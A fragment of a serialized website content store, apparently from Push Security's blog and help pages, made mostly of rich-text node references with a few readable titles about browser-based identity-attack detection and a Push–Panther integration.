472,"content":231473},{},[231474],{"nodeType":173,"value":183856,"marks":231475,"data":231476},[],{},{"nodeType":250,"data":231478,"content":231479},{},[231480,231493,231506],{"nodeType":254,"data":231481,"content":231482},{},[231483],{"nodeType":178,"data":231484,"content":231485},{},[231486,231490],{"nodeType":173,"value":157359,"marks":231487,"data":231489},[231488],{"type":370},{},{"nodeType":173,"value":157364,"marks":231491,"data":231492},[],{},{"nodeType":254,"data":231494,"content":231495},{},[231496],{"nodeType":178,"data":231497,"content":231498},{},[231499,231503],{"nodeType":173,"value":157374,"marks":231500,"data":231502},[231501],{"type":370},{},{"nodeType":173,"value":157379,"marks":231504,"data":231505},[],{},{"nodeType":254,"data":231507,"content":231508},{},[231509],{"nodeType":178,"data":231510,"content":231511},{},[231512,231516],{"nodeType":173,"value":157389,"marks":231513,"data":231515},[231514],{"type":370},{},{"nodeType":173,"value":157394,"marks":231517,"data":231518},[],{},{"nodeType":178,"data":231520,"content":231521},{},[231522],{"nodeType":173,"value":183905,"marks":231523,"data":231524},[],{},{"nodeType":250,"data":231526,"content":231527},{},[231528,231544,231560,231573],{"nodeType":254,"data":231529,"content":231530},{},[231531],{"nodeType":178,"data":231532,"content":231533},{},[231534,231537,231541],{"nodeType":173,"value":183918,"marks":231535,"data":231536},[],{},{"nodeType":173,"value":183922,"marks":231538,"data":231540},[231539],{"type":370},{},{"nodeType":173,"value":157428,"marks":231542,"data":231543},[],{},{"nodeType":254,"data":231545,"content":231546},{},[231547],{"nodeType":178,"data":231548,"content":231549},{},[231550,231553,231557],{"nodeType":173,"value":183936,"marks":231551,"data":231552},[],{},{"nodeType":173,"value":183940,"marks":231554,"data":231556},[231555],{"type":370},{},{"nodeType":173,"value":183945,"marks":231558,"data":231559},[],{},{"nodeType":254,"data":231561,"content":231562},{},[231563],{"nodeType":178,"data":231564,"content":231565},{},[231566,231570],{"nodeType":173,"value":183955,"marks":231567,"data":231569},[231568],{"type":370},{},{"nodeType":173,"value":183960,"marks":231571,"data":231572},[],{},{"nodeType":254,"data":231574,"content":231575},{},[231576],{"nodeType":178,"data":231577,"content":231578},{},[231579,231583],{"nodeType":173,"value":183970,"marks":231580,"data":231582},[231581],{"type":370},{},{"nodeType":173,"value":183975,"marks":231584,"data":231585},[],{},{"nodeType":178,"data":231587,"content":231588},{},[231589,231592,231596],{"nodeType":173,"value":183982,"marks":231590,"data":231591},[],{},{"nodeType":173,"value":2718,"marks":231593,"data":231595},[231594],{"type":370},{},{"nodeType":173,"value":183990,"marks":231597,"data":231598},[],{},{"nodeType":312,"data":231600,"content":231603},{"target":231601},{"sys":231602},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":231605,"content":231606},{},[231607],{"nodeType":173,"value":184003,"marks":231608,"data":231609},[],{},{"nodeType":169,"data":231611,"content":231612},{},[231613],{"nodeType":173,"value":184010,"marks":231614,"data":231615},[],{},{"nodeType":178,"data":231617,"content":231618},{},[231619],{"nodeType":173,"value":184017,"marks":231620,"data":231621},[],{},{"nodeType":178,"data":231623,"content":231624},{},[231625],{"nodeType":173,"value":184024,"marks":231626,"data":231627},[],{},{"nodeType":178,"data":231629,"content":231630},{},[231631,231634,231640],{"nodeType":173,"value":184031,"marks":231632,"data":231633},[],{},{"nodeType":186,"data":231635,"content":231636},{"uri":114007},[231637],{"nodeType":173,"value":184038,"marks":231638,"data":231639},[],{},{"nodeType":173,"value":184042,"marks":231641,"data":231642},[],{},{"nodeType":169,"data":231644,"content":231645},{},[231646],{"nodeType":173,"value":71801,"marks":231647,"data":231648},[],{},{"nodeType":178,"data":231650,"content":231651},{},[231652,231655,231661],{"nodeType":173,"value":184055,"marks":231653,"data":231654},[],{},{"nodeType":186,"data":231656,"content":231657},{"uri":114457},[231658],{"nodeType":173,"value":88194,"marks":231659,"data":231660},[],{},{"nodeType":173,"value":184065,"marks":231662,"data":231663},[],{},{"entries":231665},{"inline":231666,"hyperlink":231667,"block":231688},[],[231668,231672,231674,231676,231681,231686],{"sys":231669,"__typename":66743,"linkedFromParent":118,"title":231670,"slug":231671,"audience":66746},{"id":183439},"Manage security controls","manage-security-controls",{"sys":231673,"__typename":6655,"title":6656,"slug":6657,"articleId":6658},{"id":2148},{"sys":231675,"__typename":6655,"title":6676,"slug":6677,"articleId":6678},{"id":2405},{"sys":231677,"__typename":6655,"title":231678,"slug":231679,"articleId":231680},{"id":183743},"Can Push block users from visiting websites?","can-push-block-users-from-visiting-websites",10112,{"sys":231682,"__typename":6655,"title":231683,"slug":231684,"articleId":231685},{"id":114256},"How does Push help detect session token theft?","how-does-push-help-detect-session-token-theft",10114,{"sys":231687,"__typename":6655,"title":6691,"slug":6692,"articleId":6693},{"id":2466},[231689,231697,231699,231701,231705,231709,231713,231717],{"sys":231690,"__typename":127689,"title":231691,"youTubeUrl":231692,"imagePlaceholder":231693},{"id":183314},"Introducing the Push set-and-forget controls page and events feed","https://www.youtube.com/watch?v=rdbEjLtHVeI",{"url":231694,"width":231695,"height":231696},"https://images.ctfassets.net/y1cdw1ablpvd/3erssFxQsawGjQYO1OgpaY/6dce14e1031c59a31c16fc3a4aef7052/Screenshot_2024-08-15_at_07.18.14.png",3330,1866,{"sys":231698,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":231700,"__typename":5434,"title":173155,"arcadeDemoUrl":173156,"playText":51639},{"id":156217},{"sys":231702,"__typename":5434,"title":231703,"arcadeDemoUrl":231704,"playText":5437},{"id":183681},"SSO password protection demo","https://demo.arcade.software/tydMEka88g65V2KMU018?embed",{"sys":231706,"__typename":5434,"title":231707,"arcadeDemoUrl":231708,"playText":5437},{"id":183731},"URL blocking demo","https://demo.arcade.software/A6pdxTOHjVl2BaPJ98Vj?embed",{"sys":231710,"__typename":5434,"title":231711,"arcadeDemoUrl":231712,"playText":5437},{"id":183783},"Session theft detection demo","https://demo.arcade.software/ALltBFZnFbBmVFUgx7z5?embed",{"sys":231714,"__typename":5434,"title":231715,"arcadeDemoUrl":231716,"playText":5437},{"id":183819},"App banners demo","https://demo.arcade.software/TlBO2p8454bN4szY4Jxq?embed",{"sys":231718,"__typename":5345,"title":220978,"caption":118,"layoutMode":118,"file":231719},{"id":183997},{"url":220980,"width":220981,"height":220982},"content:blog:introducing-set-and-forget-controls-that-stop-real-world-identity-attacks.json","blog/introducing-set-and-forget-controls-that-stop-real-world-identity-attacks.json","blog/introducing-set-and-forget-controls-that-stop-real-world-identity-attacks",{"_path":231724,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":231725,"ogImage":118,"summary":231727,"title":114483,"subtitle":118,"metaTitle":231738,"synopsis":114484,"hashTags":118,"publishedDate":114485,"slug":114486,"tagsCollection":231739,"relatedBlogPostsCollection":231745,"authorsCollection":232616,"content":232620,"_id":232986,"_type":5439,"_source":5440,"_file":232987,"_stem":232988,"_extension":5439},"/blog/combining-the-powers-of-push-and-panther-to-stop-identity-attacks",{"id":114089,"publishedAt":231726},"2026-01-30T09:21:13.147Z",{"json":231728},{"data":231729,"content":231730,"nodeType":165},{},[231731],{"data":231732,"content":231733,"nodeType":178},{},[231734],{"data":231735,"marks":231736,"value":231737,"nodeType":173},{},[],"Push is excited to partner with Panther to help security teams correlate Push’s unique browser telemetry with existing log sources to detect and stop identity attacks, including session token theft and adversary-in-the-middle phishing toolkits.","Integrate Push Security and Panther",{"items":231740},[231741,231743],{"sys":231742,"name":509},{"id":508},{"sys":231744,"name":18399},{"id":18398},{"items":231746},[231747,232194],{"__typename":1528,"sys":231748,"content":231749,"title":212529,"synopsis":212530,"hashTags":118,"publishedDate":114485,"slug":212531,"tagsCollection":232184,"authorsCollection":232190},{"id":114220},{"json":231750},{"nodeType":165,"data":231751,"content":231752},{},[231753,231758,231764,231794,231800,231816,231822,231858,231864,231870,231876,231881,231887,231965,231971,231977,231998,232004,232010,232016,232022,232028,232034,232078,232084,232089,232105,232110,232116,232132,232138,232144,232150,232156,232162,232168],{"nodeType":312,"data":231754,"content":231757},{"target":231755},{"sys":231756},{"id":212043,"type":317,"linkType":318},[],{"nodeType":178,"data":231759,"content":231760},{},[231761],{"nodeType":173,"value":212049,"marks":231762,"data":231763},[],{},{"nodeType":250,"data":231765,"content":231766},{},[231767,231776,231785],{"nodeType":254,"data":231768,"content":231769},{},[231770],{"nodeType":178,"data":231771,"content":231772},{},[231773],{"nodeType":173,"value":212062,"marks":231774,"data":231775},[],{},{"nodeType":254,"data":231777,"content":231778},{},[231779],{"nodeType":178,"data":231780,"content":231781},{},[231782],{"nodeType":173,"value":212072,"marks":231783,"data":231784},[],{},{"nodeType":254,"data":231786,"content":231787},{},[231788],{"nodeType":178,"data":231789,"content":231790},{},[231791],{"nodeType":173,"value":212082,"marks":231792,"data":231793},[],{},{"nodeType":178,"data":231795,"content":231796},{},[231797],{"nodeType":173,"value":212089,"marks":231798,"data":231799},[],{},{"nodeType":178,"data":231801,"content":231802},{},[231803,231806,231813],{"nodeType":173,"value":212096,"marks":231804,"data":231805},[],{},{"nodeType":186,"data":231807,"content":231808},{"uri":212101},[231809],{"nodeType":173,"value":126168,"marks":231810,"data":231812},[231811],{"type":194},{},{"nodeType":173,"value":212108,"marks":231814,"data":231815},[],{},{"nodeType":169,"data":231817,"content":231818},{},[231819],{"nodeType":173,"value":212115,"marks":231820,"data":231821},[],{},{"nodeType":178,"data":231823,"content":231824},{},[231825,231828,231835,231838,231845,231848,231855],{"nodeType":173,"value":212122,"marks":231826,"data":231827},[],{},{"nodeType":186,"data":231829,"content":231830},{"uri":212127},[231831],{"nodeType":173,"value":212130,"marks":231832,"data":231834},[231833],{"type":194},{},{"nodeType":173,"value":212135,"marks":231836,"data":231837},[],{},{"nodeType":186,"data":231839,"content":231840},{"uri":212140},[231841],{"nodeType":173,"value":212143,"marks":231842,"data":231844},[231843],{"type":194},{},{"nodeType":173,"value":212148,"marks":231846,"data":231847},[],{},{"nodeType":186,"data":231849,"content":231850},{"uri":182804},[231851],{"nodeType":173,"value":212155,"marks":231852,"data":231854},[231853],{"type":194},{},{"nodeType":173,"value":212160,"marks":231856,"data":231857},[],{},{"nodeType":178,"data":231859,"content":231860},{},[231861],{"nodeType":173,"value":212167,"marks":231862,"data":231863},[],{},{"nodeType":178,"data":231865,"content":231866},{},[231867],{"nodeType":173,"value":212174,"marks":231868,"data":231869},[],{},{"nodeType":178,"data":231871,"content":231872},{},[231873],{"nodeType":173,"value":212181,"marks":231874,"data":231875},[],{},{"nodeType":312,"data":231877,"content":231880},{"target":231878},{"sys":231879},{"id":196342,"type":317,"linkType":318},[],{"nodeType":178,"data":231882,"content":231883},{},[231884],{"nodeType":173,"value":212193,"marks":231885,"data":231886},[],{},{"nodeType":250,"data":231888,"content":231889},{},[231890,231909,231928,231947],{"nodeType":254,"data":231891,"content":231892},{},[231893],{"nodeType":178,"data":231894,"content":231895},{},[231896,231899,231906],{"nodeType":173,"value":212206,"marks":231897,"data":231898},[],{},{"nodeType":186,"data":231900,"content":231901},{"uri":150408},[231902],{"nodeType":173,"value":212213,"marks":231903,"data":231905},[231904],{"type":194},{},{"nodeType":173,"value":37,"marks":231907,"data":231908},[],{},{"nodeType":254,"data":231910,"content":231911},{},[231912],{"nodeType":178,"data":231913,"content":231914},{},[231915,231918,231925],{"nodeType":173,"value":212227,"marks":231916,"data":231917},[],{},{"nodeType":186,"data":231919,"content":231920},{"uri":212232},[231921],{"nodeType":173,"value":212235,"marks":231922,"data":231924},[231923],{"type":194},{},{"nodeType":173,"value":37,"marks":231926,"data":231927},[],{},{"nodeType":254,"data":231929,"content":231930},{},[231931],{"nodeType":178,"data":231932,"content":231933},{},[231934,231937,231944],{"nodeType":173,"value":212249,"marks":231935,"data":231936},[],{},{"nodeType":186,"data":231938,"content":231939},{"uri":1297},[231940],{"nodeType":173,"value":212256,"marks":231941,"data":231943},[231942],{"type":194},{},{"nodeType":173,"value":37,"marks":231945,"data":231946},[],{},{"nodeType":254,"data":231948,"content":231949},{},[231950],{"nodeType":178,"data":231951,"content":231952},{},[231953,231956,231962],{"nodeType":173,"value":212270,"marks":231954,"data":231955},[],{},{"nodeType":186,"data":231957,"content":231958},{"uri":174431},[231959],{"nodeType":173,"value":212277,"marks":231960,"data":231961},[],{},{"nodeType":173,"value":37,"marks":231963,"data":231964},[],{},{"nodeType":169,"data":231966,"content":231967},{},[231968],{"nodeType":173,"value":212287,"marks":231969,"data":231970},[],{},{"nodeType":178,"data":231972,"content":231973},{},[231974],{"nodeType":173,"value":212294,"marks":231975,"data":231976},[],{},{"nodeType":250,"data":231978,"content":231979},{},[231980,231989],{"nodeType":254,"data":231981,"content":231982},{},[231983],{"nodeType":178,"data":231984,"content":231985},{},[231986],{"nodeType":173,"value":212307,"marks":231987,"data":231988},[],{},{"nodeType":254,"data":231990,"content":231991},{},[231992],{"nodeType":178,"data":231993,"content":231994},{},[231995],{"nodeType":173,"value":212317,"marks":231996,"data":231997},[],{},{"nodeType":178,"data":231999,"content":232000},{},[232001],{"nodeType":173,"value":212324,"marks":232002,"data":232003},[],{},{"nodeType":178,"data":232005,"content":232006},{},[232007],{"nodeType":173,"value":212331,"marks":232008,"data":232009},[],{},{"nodeType":169,"data":232011,"content":232012},{},[232013],{"nodeType":173,"value":212338,"marks":232014,"data":232015},[],{},{"nodeType":178,"data":232017,"content":232018},{},[232019],{"nodeType":173,"value":212345,"marks":232020,"data":232021},[],{},{"nodeType":178,"data":232023,"content":232024},{},[232025],{"nodeType":173,"value":212352,"marks":232026,"data":232027},[],{},{"nodeType":178,"data":232029,"content":232030},{},[232031],{"nodeType":173,"value":100610,"marks":232032,"data":232033},[],{},{"nodeType":250,"data":232035,"content":232036},{},[232037,232046,232055],{"nodeType":254,"data":232038,"content":232039},{},[232040],{"nodeType":178,"data":232041,"content":232042},{},[232043],{"nodeType":173,"value":212371,"marks":232044,"data":232045},[],{},{"nodeType":254,"data":232047,"content":232048},{},[232049],{"nodeType":178,"data":232050,"content":232051},{},[232052],{"nodeType":173,"value":212381,"marks":232053,"data":232054},[],{},{"nodeType":254,"data":232056,"content":232057},{},[232058],{"nodeType":178,"data":232059,"content":232060},{},[232061,232064,232068,232071,232075],{"nodeType":173,"value":212391,"marks":232062,"data":232063},[],{},{"nodeType":173,"value":208,"marks":232065,"data":232067},[232066],{"type":1646},{},{"nodeType":173,"value":212399,"marks":232069,"data":232070},[],{},{"nodeType":173,"value":114302,"marks":232072,"data":232074},[232073],{"type":1646},{},{"nodeType":173,"value":212407,"marks":232076,"data":232077},[],{},{"nodeType":178,"data":232079,"content":232080},{},[232081],{"nodeType":173,"value":212414,"marks":232082,"data":232083},[],{},{"nodeType":312,"data":232085,"content":232088},{"target":232086},{"sys":232087},{"id":114271,"type":317,"linkType":318},[],{"nodeType":178,"data":232090,"content":232091},{},[232092,232095,232102],{"nodeType":173,"value":212426,"marks":232093,"data":232094},[],{},{"nodeType":186,"data":232096,"content":232097},{"uri":212101},[232098],{"nodeType":173,"value":3262,"marks":232099,"data":232101},[232100],{"type":194},{},{"nodeType":173,"value":1477,"marks":232103,"data":232104},[],{},{"nodeType":312,"data":232106,"content":232109},{"target":232107},{"sys":232108},{"id":212443,"type":317,"linkType":318},[],{"nodeType":169,"data":232111,"content":232112},{},[232113],{"nodeType":173,"value":212449,"marks":232114,"data":232115},[],{},{"nodeType":178,"data":232117,"content":232118},{},[232119,232122,232129],{"nodeType":173,"value":212456,"marks":232120,"data":232121},[],{},{"nodeType":186,"data":232123,"content":232124},{"uri":212461},[232125],{"nodeType":173,"value":212464,"marks":232126,"data":232128},[232127],{"type":194},{},{"nodeType":173,"value":212469,"marks":232130,"data":232131},[],{},{"nodeType":178,"data":232133,"content":232134},{},[232135],{"nodeType":173,"value":212476,"marks":232136,"data":232137},[],{},{"nodeType":178,"data":232139,"content":232140},{},[232141],{"nodeType":173,"value":212483,"marks":232142,"data":232143},[],{},{"nodeType":178,"data":232145,"content":232146},{},[232147],{"nodeType":173,"value":212490,"marks":232148,"data":232149},[],{},{"nodeType":178,"data":232151,"content":232152},{},[232153],{"nodeType":173,"value":212497,"marks":232154,"data":232155},[],{},{"nodeType":178,"data":232157,"content":232158},{},[232159],{"nodeType":173,"value":212504,"marks":232160,"data":232161},[],{},{"nodeType":169,"data":232163,"content":232164},{},[232165],{"nodeType":173,"value":71801,"marks":232166,"data":232167},[],{},{"nodeType":178,"data":232169,"content":232170},{},[232171,232174,232181],{"nodeType":173,"value":114452,"marks":232172,"data":232173},[],{},{"nodeType":186,"data":232175,"content":232176},{"uri":473},[232177],{"nodeType":173,"value":88194,"marks":232178,"data":232180},[232179],{"type":194},{},{"nodeType":173,"value":202527,"marks":232182,"data":232183},[],{},{"items":232185},[232186,232188],{"sys":232187,"name":509},{"id":508},{"sys":232189,"name":18399},{"id":18398},{"items":232191},[232192],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":232193},{"url":2911},{"__typename":1528,"sys":232195,"content":232196,"title":217833,"synopsis":217834,"hashTags":118,"publishedDate":217835,"slug":217836,"tagsCollection":232606,"authorsCollection":232612},{"id":217358},{"json":232197},{"nodeType":165,"data":232198,"content":232199},{},[232200,232206,232212,232218,232224,232230,232236,232242,232248,232254,232270,232286,232292,232298,232314,232320,232330,232367,232373,232389,232396,232402,232408,232414,232420,232426,232484,232490,232495,232501,232507,232513,232519,232535,232541,232547,232553,232559,232565,232571,232577,232583,232589,232594,232600],{"nodeType":178,"data":232201,"content":232202},{},[232203],{"nodeType":173,"value":217367,"marks":232204,"data":232205},[],{},{"nodeType":178,"data":232207,"content":232208},{},[232209],{"nodeType":173,"value":217374,"marks":232210,"data":232211},[],{},{"nodeType":178,"data":232213,"content":232214},{},[232215],{"nodeType":173,"value":217381,"marks":232216,"data":232217},[],{},{"nodeType":178,"data":232219,"content":232220},{},[232221],{"nodeType":173,"value":217388,"marks":232222,"data":232223},[],{},{"nodeType":178,"data":232225,"content":232226},{},[232227],{"nodeType":173,"value":217395,"marks":232228,"data":232229},[],{},{"nodeType":169,"data":232231,"content":232232},{},[232233],{"nodeType":173,"value":217402,"marks":232234,"data":232235},[],{},{"nodeType":178,"data":232237,"content":232238},{},[232239],{"nodeType":173,"value":217409,"marks":232240,"data":232241},[],{},{"nodeType":178,"data":232243,"content":232244},{},[232245],{"nodeType":173,"value":217416,"marks":232246,"data":232247},[],{},{"nodeType":178,"data":232249,"content":232250},{},[232251],{"nodeType":173,"value":217423,"marks":232252,"data":232253},[],{},{"nodeType":250,"data":232255,"content":232256},{},[232257],{"nodeType":254,"data":232258,"content":232259},{},[232260],{"nodeType":178,"data":232261,"content":232262},{},[232263,232267],{"nodeType":173,"value":217436,"marks":232264,"data":232266},[232265],{"type":370},{},{"nodeType":173,"value":217441,"marks":232268,"data":232269},[],{},{"nodeType":250,"data":232271,"content":232272},{},[232273],{"nodeType":254,"data":232274,"content":232275},{},[232276],{"nodeType":178,"data":232277,"content":232278},{},[232279,232283],{"nodeType":173,"value":217454,"marks":232280,"data":232282},[232281],{"type":370},{},{"nodeType":173,"value":217459,"marks":232284,"data":232285},[],{},{"nodeType":235,"data":232287,"content":232288},{},[232289],{"nodeType":173,"value":217466,"marks":232290,"data":232291},[],{},{"nodeType":178,"data":232293,"content":232294},{},[232295],{"nodeType":173,"value":217473,"marks":232296,"data":232297},[],{},{"nodeType":178,"data":232299,"content":232300},{},[232301,232304,232311],{"nodeType":173,"value":217480,"marks":232302,"data":232303},[],{},{"nodeType":186,"data":232305,"content":232306},{"uri":217485},[232307],{"nodeType":173,"value":217488,"marks":232308,"data":232310},[232309],{"type":194},{},{"nodeType":173,"value":217493,"marks":232312,"data":232313},[],{},{"nodeType":178,"data":232315,"content":232316},{},[232317],{"nodeType":173,"value":217500,"marks":232318,"data":232319},[],{},{"nodeType":178,"data":232321,"content":232322},{},[232323,232326],{"nodeType":173,"value":217507,"marks":232324,"data":232325},[],{},{"nodeType":173,"value":217511,"marks":232327,"data":232329},[232328],{"type":370},{},{"nodeType":250,"data":232331,"content":232332},{},[232333,232350],{"nodeType":254,"data":232334,"content":232335},{},[232336],{"nodeType":178,"data":232337,"content":232338},{},[232339,232343,232346],{"nodeType":173,"value":217525,"marks":232340,"data":232342},[232341],{"type":370},{},{"nodeType":173,"value":217530,"marks":232344,"data":232345},[],{},{"nodeType":173,"value":217534,"marks":232347,"data":232349},[232348],{"type":1646},{},{"nodeType":254,"data":232351,"content":232352},{},[232353],{"nodeType":178,"data":232354,"content":232355},{},[232356,232360,232363],{"nodeType":173,"value":217545,"marks":232357,"data":232359},[232358],{"type":370},{},{"nodeType":173,"value":217550,"marks":232361,"data":232362},[],{},{"nodeType":173,"value":217554,"marks":232364,"data":232366},[232365],{"type":370},{},{"nodeType":178,"data":232368,"content":232369},{},[232370],{"nodeType":173,"value":217562,"marks":232371,"data":232372},[],{},{"nodeType":178,"data":232374,"content":232375},{},[232376,232380,232385],{"nodeType":173,"value":217569,"marks":232377,"data":232379},[232378],{"type":370},{},{"nodeType":173,"value":217574,"marks":232381,"data":232384},[232382,232383],{"type":1646},{"type":370},{},{"nodeType":173,"value":217580,"marks":232386,"data":232388},[232387],{"type":370},{},{"nodeType":169,"data":232390,"content":232391},{},[232392],{"nodeType":173,"value":217588,"marks":232393,"data":232395},[232394],{"type":370},{},{"nodeType":178,"data":232397,"content":232398},{},[232399],{"nodeType":173,"value":217596,"marks":232400,"data":232401},[],{},{"nodeType":178,"data":232403,"content":232404},{},[232405],{"nodeType":173,"value":217603,"marks":232406,"data":232407},[],{},{"nodeType":178,"data":232409,"content":232410},{},[232411],{"nodeType":173,"value":217610,"marks":232412,"data":232413},[],{},{"nodeType":178,"data":232415,"content":232416},{},[232417],{"nodeType":173,"value":217617,"marks":232418,"data":232419},[],{},{"nodeType":178,"data":232421,"content":232422},{},[232423],{"nodeType":173,"value":217624,"marks":232424,"data":232425},[],{},{"nodeType":250,"data":232427,"content":232428},{},[232429,232448,232466],{"nodeType":254,"data":232430,"content":232431},{},[232432],{"nodeType":178,"data":232433,"content":232434},{},[232435,232438,232445],{"nodeType":173,"value":37,"marks":232436,"data":232437},[],{},{"nodeType":186,"data":232439,"content":232440},{"uri":9099},[232441],{"nodeType":173,"value":217643,"marks":232442,"data":232444},[232443],{"type":194},{},{"nodeType":173,"value":217648,"marks":232446,"data":232447},[],{},{"nodeType":254,"data":232449,"content":232450},{},[232451],{"nodeType":178,"data":232452,"content":232453},{},[232454,232457,232463],{"nodeType":173,"value":37,"marks":232455,"data":232456},[],{},{"nodeType":186,"data":232458,"content":232459},{"uri":75048},[232460],{"nodeType":173,"value":217664,"marks":232461,"data":232462},[],{},{"nodeType":173,"value":217668,"marks":232464,"data":232465},[],{},{"nodeType":254,"data":232467,"content":232468},{},[232469],{"nodeType":178,"data":232470,"content":232471},{},[232472,232475,232481],{"nodeType":173,"value":37,"marks":232473,"data":232474},[],{},{"nodeType":186,"data":232476,"content":232477},{"uri":217682},[232478],{"nodeType":173,"value":217685,"marks":232479,"data":232480},[],{},{"nodeType":173,"value":217689,"marks":232482,"data":232483},[],{},{"nodeType":178,"data":232485,"content":232486},{},[232487],{"nodeType":173,"value":217696,"marks":232488,"data":232489},[],{},{"nodeType":312,"data":232491,"content":232494},{"target":232492},{"sys":232493},{"id":75120,"type":317,"linkType":318},[],{"nodeType":178,"data":232496,"content":232497},{},[232498],{"nodeType":173,"value":217708,"marks":232499,"data":232500},[],{},{"nodeType":169,"data":232502,"content":232503},{},[232504],{"nodeType":173,"value":217715,"marks":232505,"data":232506},[],{},{"nodeType":178,"data":232508,"content":232509},{},[232510],{"nodeType":173,"value":217722,"marks":232511,"data":232512},[],{},{"nodeType":235,"data":232514,"content":232515},{},[232516],{"nodeType":173,"value":217729,"marks":232517,"data":232518},[],{},{"nodeType":178,"data":232520,"content":232521},{},[232522,232525,232532],{"nodeType":173,"value":217736,"marks":232523,"data":232524},[],{},{"nodeType":186,"data":232526,"content":232527},{"uri":115077},[232528],{"nodeType":173,"value":217743,"marks":232529,"data":232531},[232530],{"type":194},{},{"nodeType":173,"value":217748,"marks":232533,"data":232534},[],{},{"nodeType":178,"data":232536,"content":232537},{},[232538],{"nodeType":173,"value":217755,"marks":232539,"data":232540},[],{},{"nodeType":178,"data":232542,"content":232543},{},[232544],{"nodeType":173,"value":217762,"marks":232545,"data":232546},[],{},{"nodeType":178,"data":232548,"content":232549},{},[232550],{"nodeType":173,"value":217769,"marks":232551,"data":232552},[],{},{"nodeType":235,"data":232554,"content":232555},{},[232556],{"nodeType":173,"value":217776,"marks":232557,"data":232558},[],{},{"nodeType":178,"data":232560,"content":232561},{},[232562],{"nodeType":173,"value":217783,"marks":232563,"data":232564},[],{},{"nodeType":178,"data":232566,"content":232567},{},[232568],{"nodeType":173,"value":217790,"marks":232569,"data":232570},[],{},{"nodeType":235,"data":232572,"content":232573},{},[232574],{"nodeType":173,"value":217797,"marks":232575,"data":232576},[],{},{"nodeType":178,"data":232578,"content":232579},{},[232580],{"nodeType":173,"value":217804,"marks":232581,"data":232582},[],{},{"nodeType":178,"data":232584,"content":232585},{},[232586],{"nodeType":173,"value":217811,"marks":232587,"data":232588},[],{},{"nodeType":312,"data":232590,"content":232593},{"target":232591},{"sys":232592},{"id":217818,"type":317,"linkType":318},[],{"nodeType":169,"data":232595,"content":232596},{},[232597],{"nodeType":173,"value":40632,"marks":232598,"data":232599},[],{},{"nodeType":178,"data":232601,"content":232602},{},[232603],{"nodeType":173,"value":217830,"marks":232604,"data":232605},[],{},{"items":232607},[232608,232610],{"sys":232609,"name":509},{"id":508},{"sys":232611,"name":505},{"id":504},{"items":232613},[232614],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":232615},{"url":1496},{"items":232617},[232618],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":232619},{"url":2911},{"json":232621,"links":232954},{"nodeType":165,"data":232622,"content":232623},{},[232624,232630,232636,232678,232684,232690,232696,232701,232716,232722,232740,232746,232752,232770,232775,232805,232811,232817,232822,232828,232834,232840,232846,232852,232918,232924,232939],{"nodeType":178,"data":232625,"content":232626},{},[232627],{"nodeType":173,"value":114098,"marks":232628,"data":232629},[],{},{"nodeType":178,"data":232631,"content":232632},{},[232633],{"nodeType":173,"value":114105,"marks":232634,"data":232635},[],{},{"nodeType":250,"data":232637,"content":232638},{},[232639,232652,232665],{"nodeType":254,"data":232640,"content":232641},{},[232642],{"nodeType":178,"data":232643,"content":232644},{},[232645,232649],{"nodeType":173,"value":114118,"marks":232646,"data":232648},[232647],{"type":370},{},{"nodeType":173,"value":114123,"marks":232650,"data":232651},[],{},{"nodeType":254,"data":232653,"content":232654},{},[232655],{"nodeType":178,"data":232656,"content":232657},{},[232658,232662],{"nodeType":173,"value":114133,"marks":232659,"data":232661},[232660],{"type":370},{},{"nodeType":173,"value":114138,"marks":232663,"data":232664},[],{},{"nodeType":254,"data":232666,"content":232667},{},[232668],{"nodeType":178,"data":232669,"content":232670},{},[232671,232675],{"nodeType":173,"value":114148,"marks":232672,"data":232674},[232673],{"type":370},{},{"nodeType":173,"value":114153,"marks":232676,"data":232677},[],{},{"nodeType":178,"data":232679,"content":232680},{},[232681],{"nodeType":173,"value":114160,"marks":232682,"data":232683},[],{},{"nodeType":178,"data":232685,"content":232686},{},[232687],{"nodeType":173,"value":114167,"marks":232688,"data":232689},[],{},{"nodeType":178,"data":232691,"content":232692},{},[232693],{"nodeType":173,"value":114174,"marks":232694,"data":232695},[],{},{"nodeType":312,"data":232697,"content":232700},{"target":232698},{"sys":232699},{"id":114181,"type":317,"linkType":318},[],{"nodeType":178,"data":232702,"content":232703},{},[232704,232707,232713],{"nodeType":173,"value":114187,"marks":232705,"data":232706},[],{},{"nodeType":186,"data":232708,"content":232709},{"uri":114192},[232710],{"nodeType":173,"value":114195,"marks":232711,"data":232712},[],{},{"nodeType":173,"value":114199,"marks":232714,"data":232715},[],{},{"nodeType":169,"data":232717,"content":232718},{},[232719],{"nodeType":173,"value":114206,"marks":232720,"data":232721},[],{},{"nodeType":178,"data":232723,"content":232724},{},[232725,232728,232737],{"nodeType":173,"value":114213,"marks":232726,"data":232727},[],{},{"nodeType":1698,"data":232729,"content":232732},{"target":232730},{"sys":232731},{"id":114220,"type":317,"linkType":318},[232733],{"nodeType":173,"value":114223,"marks":232734,"data":232736},[232735],{"type":370},{},{"nodeType":173,"value":114228,"marks":232738,"data":232739},[],{},{"nodeType":178,"data":232741,"content":232742},{},[232743],{"nodeType":173,"value":114235,"marks":232744,"data":232745},[],{},{"nodeType":178,"data":232747,"content":232748},{},[232749],{"nodeType":173,"value":114242,"marks":232750,"data":232751},[],{},{"nodeType":178,"data":232753,"content":232754},{},[232755,232758,232767],{"nodeType":173,"value":114249,"marks":232756,"data":232757},[],{},{"nodeType":1698,"data":232759,"content":232762},{"target":232760},{"sys":232761},{"id":114256,"type":317,"linkType":318},[232763],{"nodeType":173,"value":114259,"marks":232764,"data":232766},[232765],{"type":370},{},{"nodeType":173,"value":114264,"marks":232768,"data":232769},[],{},{"nodeType":312,"data":232771,"content":232774},{"target":232772},{"sys":232773},{"id":114271,"type":317,"linkType":318},[],{"nodeType":178,"data":232776,"content":232777},{},[232778,232781,232788,232791,232795,232798,232802],{"nodeType":173,"value":114277,"marks":232779,"data":232780},[],{},{"nodeType":186,"data":232782,"content":232783},{"uri":114282},[232784],{"nodeType":173,"value":114285,"marks":232785,"data":232787},[232786],{"type":370},{},{"nodeType":173,"value":114290,"marks":232789,"data":232790},[],{},{"nodeType":173,"value":208,"marks":232792,"data":232794},[232793],{"type":1646},{},{"nodeType":173,"value":114298,"marks":232796,"data":232797},[],{},{"nodeType":173